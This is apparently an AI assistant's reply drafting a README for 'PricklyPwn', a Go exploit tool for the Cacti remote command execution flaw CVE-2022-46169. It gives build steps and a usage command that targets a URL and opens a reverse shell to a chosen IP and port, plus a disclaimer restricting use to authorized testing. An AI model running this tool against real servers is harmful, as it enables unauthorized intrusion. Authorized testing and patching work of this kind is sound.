Sure! Here's a "dope" README.md for your PricklyPwn
project:
Penetrate with precision. A Remote Command Execution Exploit for Cacti v1.2.22.
PricklyPwn is a sleek, high-performance tool crafted in Go, designed to exploit the Remote Command Execution (RCE) vulnerability found in Cacti versions up to v1.2.22. Built for security enthusiasts, ethical hackers, and defenders, it assists in comprehending and remediating the CVE-2022-46169 vulnerability.
# Clone this repository
git clone https://github.com/your_username/PricklyPwn.git
# Navigate to the PricklyPwn directory
cd PricklyPwn
# Build the Go binary
go build -o PricklyPwn main.go
# Basic usage
./PricklyPwn -url <target_url> -remote_ip <reverse_shell_ip> -remote_port <reverse_shell_port>
For more advanced options, refer to the documentation.
This tool is strictly intended for educational and legal, authorized penetration testing purposes. Always get explicit permission before attempting any kind of testing. Unauthorized hacking is illegal and unethical. The PricklyPwn
team cannot and will not bear responsibility for misuse.
- Thanks to all security researchers who continuously push the boundaries and inspire tools like this.
- Special shoutout to the Cacti team for their commitment to making the internet a safer place.